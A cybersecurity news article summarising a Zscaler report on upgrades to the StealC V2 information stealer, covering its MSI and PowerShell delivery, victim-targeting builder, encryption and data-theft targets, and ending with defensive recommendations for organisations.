StealC, an information stealer and malware downloader, has got upgrades to substantially expand its attack surface and effectiveness.
The malware, which has been actively sold on underground forums since January 2023, rolled out its version 2 (V2) in March 2025 with sophisticated enhancements.
According to a recent report from Zscaler, StealC V2 now leverages Microsoft Software Installer (MSI) packages and PowerShell scripts as delivery mechanisms, moving beyond traditional executable files.
The MSI packages are deployed silently through msiexec.exe with built-in retry functionality, while PowerShell scripts execute remotely without retries-both approaches designed to evade detection.
Among the most significant enhancements is StealC V2’s redesigned control panel featuring an integrated builder that allows threat actors to customize payload delivery based on specific parameters:
- Geographic location of the victim
- Hardware identification numbers (HWID)
- Software installed on the target system
The malware has undergone substantial technical refinement, including:
- Implementation of RC4 encryption in recent variants (after version 2.1.1)
- A streamlined JSON-based command-and-control communication protocol
- Multi-monitor screenshot capture capability
- Server-side brute-forcing for credentials
- Unified file grabber targeting crypto wallets, gaming applications, VPNs, email clients, and browsers
StealC V2 has been compiled specifically for 64-bit architectures and supports Chrome v20 application-bound encryption, demonstrating its adaptation to modern computing environments.
Meanwhile, it has abandoned certain features from its predecessor, including anti-VM checks and third-party DLL downloads.
Perhaps most concerning to security professionals is evidence of StealC’s professional development cycle. The malware is typically protected using Themida for obfuscation and employs a two-stage deobfuscation process for strings.
Its development team delivers regular updates via ZIP archives containing builder templates and version configurations.
The control panel now includes Telegram bot integration for notifications, allowing attackers to receive real-time alerts when valuable data is exfiltrated.
Rule-based payload delivery can trigger specific loaders when markers like “coinbase.com” appear in stolen data, indicating a highly targeted approach to financial information theft.
Security experts recommend organizations take the following protective measures:
- Implement application allowlisting to prevent unauthorized MSI packages from executing
- Enable PowerShell script block logging and constrained language mode
- Deploy advanced endpoint detection and response (EDR) solutions with behavioral analysis
- Conduct regular security awareness training focusing on social engineering tactics used to deliver initial infection
For technical indicators of compromise and detection methods, organizations are encouraged to consult the detailed analysis published by Zscaler’s ThreatLabz.
You must be logged in to post a comment.